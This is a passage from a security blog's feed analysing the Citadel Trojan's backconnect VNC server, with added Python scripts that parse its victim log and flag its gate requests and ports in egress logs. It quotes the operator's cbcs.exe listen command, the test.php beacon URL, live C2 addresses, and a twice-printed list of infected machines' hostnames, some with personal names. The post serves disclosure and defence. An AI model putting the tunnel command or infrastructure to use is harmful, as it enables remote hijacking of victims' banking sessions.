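    hostname = ident.group("host") if ident else m.group("bot")
    return BackconnectEntry(
        seen=datetime.strptime(m.group("ts"), "%d.%m.%Y %H:%M:%S"),
        bot_id=m.group("bot"),
        hostname=hostname,
        client_port=int(m.group("p1")),
        bot_port=int(m.group("p2")),
    )


def parse_log(text: str) -> List[BackconnectEntry]:
    """Parse a whole log.txt, skipping blank and malformed lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        if entry is not None:
            entries.append(entry)
    return entries


def victim_hostnames(entries: List[BackconnectEntry]) -> Set[str]:
    """Distinct Windows hostnames in the log: the starting point for notification."""
    return {e.hostname for e in entries}


def beacon_bot_id(url: str) -> Optional[str]:
    """Return the bot ID if `url` looks like the kit's test.php connectivity
    check (test.php?p1=<port>&p2=<port>&b=<bot id>), otherwise None."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/test.php"):
        return None
    q = parse_qs(parts.query)
    p1 = q.get("p1", [""])[0]
    p2 = q.get("p2", [""])[0]
    bot = q.get("b", [""])[0]
    if p1.isdigit() and p2.isdigit() and BOT_ID.match(bot):
        return bot
    return None


# Three lines copied from the post's log.txt excerpt, plus one constructed
# malformed line to show that the parser skips it.
SAMPLE_LOG = """\
[04.09.2012 15:37:48] WOLF_7875768F483EE109, p1=11968 ,p2=34851
[04.09.2012 15:38:22] PERSONAL_74DEB1E387314069, p1=18666 ,p2=38002
[04.09.2012 23:48:39] ANDRES-HP_E532648A4A3763CB, p1=19870 ,p2=28229
this line is constructed garbage and must be skipped
"""

if __name__ == "__main__":
    for e in parse_log(SAMPLE_LOG):
        print(f"{e.seen:%Y-%m-%d %H:%M:%S}  {e.hostname:10}  "
              f"client={e.client_port}  bot={e.bot_port}")
    # The placeholder host name is the one the post itself uses.
    print(beacon_bot_id("http://winserv_php_gate/test.php"
                        "?p1=13319&p2=23283&b=AKSERVER_D9FA7E50D0F76FCB"))
```

<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">The hostname is split off the bot ID at its last underscore, so a host such as ANDRES-HP survives intact, and a bot ID that does not fit the pattern is kept whole rather than dropped. Timestamps are parsed as local server time, since the log carries no zone; the p1/p2 pairs are only meaningful together with the server's listen command, as the same line in the log maps to one VNC session.</span></div>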
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Access to the statistics panel that displays active
VNC connections is via the URL: hXXp://ip-serv/control.html<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">On this server, the list of computers
infected with the Trojan and used by criminals for fraudulent purposes can be seen at
hXXp://195.242.218.25/control.html<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-XIZxyFO3dA8/UME7HzLsafI/AAAAAAAAATk/P-_SLd5rFgk/s1600/vnc-control.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="http://2.bp.blogspot.com/-XIZxyFO3dA8/UME7HzLsafI/AAAAAAAAATk/P-_SLd5rFgk/s400/vnc-control.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">This list of infected users is also stored in the
server file:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hXXp://195.242.218.25/log.txt<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[04.09.2012
15:37:48] WOLF_7875768F483EE109, p1=11968 ,p2=34851<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[04.09.2012
15:38:22] PERSONAL_74DEB1E387314069, p1=18666 ,p2=38002<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[04.09.2012
23:48:39] ANDRES-HP_E532648A4A3763CB, p1=19870 ,p2=28229<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[04.09.2012
23:50:17] 3A0AAE55F75646A_7875768F3990DE0A, p1=14943 ,p2=36576<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[04.09.2012
23:51:50] ADMIN-PC_74DEB1E3F090E324, p1=17688 ,p2=31963<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[05.09.2012
17:37:08] DIAL_INT-PC_E532648A8AFF5F32, p1=15504 ,p2=35943<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[05.09.2012
17:38:35] LUIS-4E3325EABE_B4DF7611605FA143, p1=11689 ,p2=29435<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[06.09.2012
13:53:25] RAULSISTEMAS_4983EC5A2711C179, p1=12665 ,p2=24109<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[06.09.2012
13:55:15] CARLOS_7875768F483EE109, p1=18871 ,p2=25181<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[06.09.2012
13:55:49] JAVIER_B4DF7611483EE109, p1=11475 ,p2=26807<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[06.09.2012
13:56:24] OMARVAZQUEZ_1CB98D876522DF69, p1=15011 ,p2=31385<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[06.09.2012
13:57:45] PUESTOV_4983EC5ACB9AD960, p1=19115 ,p2=34960<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[07.09.2012
15:47:07] SHXP2364_7875768F7E657C89, p1=14409 ,p2=36871<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[07.09.2012
15:48:23] PERSONAL_74DEB1E387314069, p1=10806 ,p2=34226<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[07.09.2012 15:48:34] PC-JAVIER_7875768FEABD3289,
p1=17728 ,p2=36485<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[07.09.2012
15:49:00] DIAGONALMARLIM1_4A073834B2FFEE74, p1=18676 ,p2=28923<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[07.09.2012
15:50:10] ANA-MARI-THINK_74DEB1E315C0DF75, p1=19752 ,p2=37007</span><span style="font-size: 11pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">This list contains only users from Spain that have
probably been victims of fraud in their online bank accounts.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Currently other servers have been located containing
the same VNC criminal infrastructure:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://95.77.98.137/ hosted on the provider UPC
Romania BUCURESTI B2B MPLS from Romania<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-PgwOkcP7FGo/UME6lI7vY4I/AAAAAAAAATM/Y30acO9vovY/s1600/vnc4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-PgwOkcP7FGo/UME6lI7vY4I/AAAAAAAAATM/Y30acO9vovY/s400/vnc4.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://www.wanderbaresdeutschland.de/ hosted on the
IP 85.214.116.67 belonging to provider stratoserver.net
from Germany<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN;"><span class="hps"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-wLngDupxMTI/UME7RXRIa3I/AAAAAAAAATs/i5oEodbzVHY/s1600/vnc5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-wLngDupxMTI/UME7RXRIa3I/AAAAAAAAATs/i5oEodbzVHY/s400/vnc5.jpg" width="332" /></a></div>
<div class="MsoNormal">
<span lang="EN" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN;"><span class="hps"><br /></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://46.166.129.65/ hosted on the provider SANTREX-INTERNET-SERVICES
from UK<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-49245746297148705572012-12-06T16:44:00.001-08:002012-12-06T16:46:53.740-08:00Citadel Trojan BackConnect Windows Server VNC Manager<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The Citadel
Trojan kit includes a module that allows connecting remotely via a VNC client to the
computers of the users infected by the Trojan.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-hG7CVZiKngs/UME6Xpq0J_I/AAAAAAAAATE/-RwgopE3QBo/s1600/vnc3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="http://3.bp.blogspot.com/-hG7CVZiKngs/UME6Xpq0J_I/AAAAAAAAATE/-RwgopE3QBo/s400/vnc3.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES" style="font-family: Arial; font-size: 11.0pt; mso-ansi-language: ES;">This allows the criminals to connect
to the infected machine and carry out financial transactions through it, which makes the fraudulent transfers
practically undetectable by the bank's transaction monitoring systems, since they are
performed from the customer's legitimate IP address and computer.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The
VNC Manager kit consists of the following
files:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ZuDOj5HY5aQ/UME6tGffOBI/AAAAAAAAATU/zEMXh85C1A4/s1600/vnc-good.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://1.bp.blogspot.com/-ZuDOj5HY5aQ/UME6tGffOBI/AAAAAAAAATU/zEMXh85C1A4/s400/vnc-good.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The script
test.php is used to check the connectivity of the infected computer.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://winserv_php_gate/test.php?p1=13319&p2=23283&b=AKSERVER_D9FA7E50D0F76FCB<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The code
of this script is as follows:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-CPtlE4boLKE/UME60vwxRBI/AAAAAAAAATc/7bJCPv7XOEE/s1600/test.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="http://1.bp.blogspot.com/-CPtlE4boLKE/UME60vwxRBI/AAAAAAAAATc/7bJCPv7XOEE/s400/test.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">It can be seen
that the file that opens the tunnel on the indicated ports is the executable
cbcs.exe (Citadel Backconnect Server), an updated version of the same
application used by the well-known ZeuS Trojan: zsbcs.exe (ZeuS BackConnect Server).</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The connection
is started as follows:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">C:\>zsbcs.exe
listen -cp:13319 -bp:23283<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">C:\>
cbcs.exe listen -cp:13319 -bp:23283<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Citadel
Backconnect Server 1.2.0.0.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Build time:
13:12:41 07.12.2012 GMT.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Listening
on IPv4 port 23283.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Listening
on IPv4 port 13319.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Press
Ctrl+C key to shutdown server.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Waiting for
incoming connections (port of bot:23283, port of client:13319)<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Once the
tunnel is open, the criminal can connect remotely via VNC or
run commands on the infected user's computer, gaining full control
of the machine and its desktop. By watching when the user interacts with their
online banking applications, they can run scripts on the infected machine
to modify the customer's transactions and operate with the user
credentials stolen by the Citadel Trojan.<o:p></o:p></span></div>
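<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">As an added example (it is not part of the original post nor of the Citadel kit), the following Python script shows what the two artefacts described above look like from the defender's side and how to flag them in egress logs: the gate request to test.php carrying the p1, p2 and b parameters, and outbound connections to the two backconnect listener ports (23283 for the bot, 13319 for the operator's client). The log lines and their space-separated layout are constructed for the example; the gate hostname winserv_php_gate and the bot id AKSERVER_D9FA7E50D0F76FCB are the placeholders used in the post, and 203.0.113.0/24 and 198.51.100.0/24 are documentation addresses.</span></div>

```python
import re
from urllib.parse import urlparse, parse_qs

# Listener ports shown in the cbcs.exe console output of the post:
# 23283 is the bot side of the tunnel, 13319 the operator ("client") side.
BACKCONNECT_PORTS = {23283, 13319}

# Constructed sample egress log (not real data). Layout, one record per line:
# "<timestamp> <src_ip> <dst_ip>:<dst_port> <method> <url>"
SAMPLE_PROXY_LOG = """\
2012-09-04T15:37:40Z 10.0.0.15 203.0.113.10:80 GET http://winserv_php_gate/test.php?p1=13319&p2=23283&b=AKSERVER_D9FA7E50D0F76FCB
2012-09-04T15:37:41Z 10.0.0.15 203.0.113.10:23283 CONNECT -
2012-09-04T15:38:00Z 10.0.0.22 198.51.100.7:443 GET https://intranet.example/test.php?id=42
2012-09-04T15:39:12Z 10.0.0.31 198.51.100.9:80 GET http://example.org/index.html
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+):(\d+) (\S+) (\S+)$")


def parse_line(line):
    """Split one constructed log record into its fields; None if it does not fit."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, dst, port, method, url = m.groups()
    return {"ts": ts, "src": src, "dst": dst, "port": int(port),
            "method": method, "url": url}


def is_gate_request(url):
    """True for a test.php request whose query carries numeric p1/p2 and a b (bot id).

    A plain test.php on some intranet (without those three parameters) is not flagged,
    which keeps the rule specific to the gate pattern seen in the post.
    """
    parsed = urlparse(url)
    if not parsed.path.endswith("/test.php"):
        return False
    qs = parse_qs(parsed.query)
    if not all(k in qs for k in ("p1", "p2", "b")):
        return False
    return qs["p1"][0].isdigit() and qs["p2"][0].isdigit()


def bot_id_from_gate(url):
    """The b= value identifies the infected machine in the gate call."""
    return parse_qs(urlparse(url).query)["b"][0]


def scan(log_text):
    """Return (rule, source_ip, detail) tuples for every suspicious record."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if is_gate_request(rec["url"]):
            alerts.append(("backconnect-gate", rec["src"], bot_id_from_gate(rec["url"])))
        elif rec["port"] in BACKCONNECT_PORTS:
            alerts.append(("backconnect-port", rec["src"], rec["port"]))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_PROXY_LOG):
        print(alert)
```

<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The port rule alone is noisy (any service may happen to use those ports), so in practice the gate request is the stronger signal and the port hit is best used to confirm the same source address shortly afterwards, as the sample shows for 10.0.0.15.</span></div>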
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The
statistics panel showing the valid VNC connections is accessed
via the URL: hXXp://ip-serv/control.html<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">On the
server located above, the list of computers infected by
the Trojan and used by the criminals for their fraudulent
purposes can be seen at the address: </span><br />
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span>
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://195.242.218.25/control.html<o:p></o:p></span><br />
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-XIZxyFO3dA8/UME7HzLsafI/AAAAAAAAATk/P-_SLd5rFgk/s1600/vnc-control.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="http://2.bp.blogspot.com/-XIZxyFO3dA8/UME7HzLsafI/AAAAAAAAATk/P-_SLd5rFgk/s400/vnc-control.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">This list
of infected users is also stored in the file: hXXp://195.242.218.25/log.txt</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[04.09.2012
15:37:48] WOLF_7875768F483EE109, p1=11968 ,p2=34851<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[04.09.2012
15:38:22] PERSONAL_74DEB1E387314069, p1=18666 ,p2=38002<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[04.09.2012
23:48:39] ANDRES-HP_E532648A4A3763CB, p1=19870 ,p2=28229<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[04.09.2012
23:50:17] 3A0AAE55F75646A_7875768F3990DE0A, p1=14943 ,p2=36576<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[04.09.2012
23:51:50] ADMIN-PC_74DEB1E3F090E324, p1=17688 ,p2=31963<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[05.09.2012
17:37:08] DIAL_INT-PC_E532648A8AFF5F32, p1=15504 ,p2=35943<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[05.09.2012
17:38:35] LUIS-4E3325EABE_B4DF7611605FA143, p1=11689 ,p2=29435<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[06.09.2012
13:53:25] RAULSISTEMAS_4983EC5A2711C179, p1=12665 ,p2=24109<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[06.09.2012
13:55:15] CARLOS_7875768F483EE109, p1=18871 ,p2=25181<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[06.09.2012
13:55:49] JAVIER_B4DF7611483EE109, p1=11475 ,p2=26807<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[06.09.2012
13:56:24] OMARVAZQUEZ_1CB98D876522DF69, p1=15011 ,p2=31385<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[06.09.2012
13:57:45] PUESTOV_4983EC5ACB9AD960, p1=19115 ,p2=34960<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[07.09.2012
15:47:07] SHXP2364_7875768F7E657C89, p1=14409 ,p2=36871<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[07.09.2012
15:48:23] PERSONAL_74DEB1E387314069, p1=10806 ,p2=34226<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[07.09.2012
15:48:34] PC-JAVIER_7875768FEABD3289, p1=17728 ,p2=36485<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[07.09.2012
15:49:00] DIAGONALMARLIM1_4A073834B2FFEE74, p1=18676 ,p2=28923<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[07.09.2012
15:50:10] ANA-MARI-THINK_74DEB1E315C0DF75, p1=19752 ,p2=37007</span><span style="font-size: x-small;"><o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">It can be seen
that this list contains mainly users of Spanish origin who
will have been victims of fraud in their online bank accounts.<o:p></o:p></span></div>
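<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The log.txt listing reproduced above (and in the English version of this post) has a fixed layout: a timestamp in brackets, the victim's hostname joined with an underscore to a 16-character hexadecimal bot id, then the p1 and p2 values the bot reported. As an added example, not part of the original post or the kit, the following Python parser turns such a file into records and summarises what an analyst handling the incident wants first: how many distinct machines appear, which ones checked in more than once, and which bot ids are shared by several hostnames (as WOLF and CARLOS share one in the listing). The sample lines are constructed in the same layout; the hostnames and ids in them are invented.</span></div>

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Layout of one log.txt entry, as shown in the post:
# "[DD.MM.YYYY HH:MM:SS] <HOSTNAME>_<16 hex BOTID>, p1=<n> ,p2=<n>"
# Hostnames may themselves contain underscores, so the hostname is matched
# non-greedily and the bot id is pinned to exactly 16 hex digits.
ENTRY_RE = re.compile(
    r"^\[(\d{2}\.\d{2}\.\d{4} \d{2}:\d{2}:\d{2})\] "
    r"(?P<name>.+?)_(?P<botid>[0-9A-F]{16}), p1=(?P<p1>\d+) ,p2=(?P<p2>\d+)$"
)

# Constructed sample (invented hostnames and bot ids, same layout as log.txt).
# The garbage line stands in for truncated or corrupted entries a real dump may contain.
SAMPLE_LOG = """\
[04.09.2012 15:37:48] HOST-A_0123456789ABCDEF, p1=11968 ,p2=34851
[04.09.2012 15:38:22] HOST-B_FEDCBA9876543210, p1=18666 ,p2=38002
[05.09.2012 17:37:08] HOST-C_0123456789ABCDEF, p1=15504 ,p2=35943
[07.09.2012 15:48:23] HOST-B_FEDCBA9876543210, p1=10806 ,p2=34226
this line is garbage and must be skipped
"""


def parse_log(text):
    """Parse every well-formed entry; lines that do not match are skipped, not fatal."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m:
            continue
        entries.append({
            "when": datetime.strptime(m.group(1), "%d.%m.%Y %H:%M:%S"),
            "name": m.group("name"),
            "botid": m.group("botid"),
            "p1": int(m.group("p1")),
            "p2": int(m.group("p2")),
        })
    return entries


def summarize(entries):
    """Counts an incident handler needs before contacting the affected customers."""
    per_day = Counter(e["when"].date().isoformat() for e in entries)
    per_machine = Counter(f'{e["name"]}_{e["botid"]}' for e in entries)
    names_by_botid = defaultdict(set)
    for e in entries:
        names_by_botid[e["botid"]].add(e["name"])
    return {
        "total": len(entries),
        "unique_machines": len(per_machine),
        "per_day": dict(per_day),
        # machines that reconnected to the backconnect server more than once
        "reconnected": sorted(m for m, n in per_machine.items() if n > 1),
        # one bot id reported under several hostnames: worth a closer look
        "shared_botid": {b: sorted(n) for b, n in names_by_botid.items() if len(n) > 1},
    }


if __name__ == "__main__":
    report = summarize(parse_log(SAMPLE_LOG))
    for key, value in report.items():
        print(f"{key}: {value}")
```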
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Several
servers containing this criminal infrastructure have currently been located:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.77.98.137/
hosted on the provider UPC Romania BUCURESTI B2B MPLS from Romania<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-PgwOkcP7FGo/UME6lI7vY4I/AAAAAAAAATM/Y30acO9vovY/s1600/vnc4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-PgwOkcP7FGo/UME6lI7vY4I/AAAAAAAAATM/Y30acO9vovY/s400/vnc4.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://www.wanderbaresdeutschland.de/
hosted on the IP
85.214.116.67 belonging to the provider stratoserver.net from Germany<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-wLngDupxMTI/UME7RXRIa3I/AAAAAAAAATs/i5oEodbzVHY/s1600/vnc5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-wLngDupxMTI/UME7RXRIa3I/AAAAAAAAATs/i5oEodbzVHY/s640/vnc5.jpg" width="531" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">hXXp://46.166.129.65/
hosted on the provider SANTREX-INTERNET-SERVICES from the UK</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-62257733227456644612012-11-20T07:56:00.000-08:002012-11-20T07:56:36.847-08:00Trojan SPYEYE against users from the Balkan Republics<br />
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">A criminal
infrastructure of the SpyEye Trojan Control Panel has been identified, prepared to steal confidential
data from users of the Balkan republics.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">This server
is hosted on IP 91.220.35.45, which belongs to the ZAMANHOST-NET provider in Romania. This
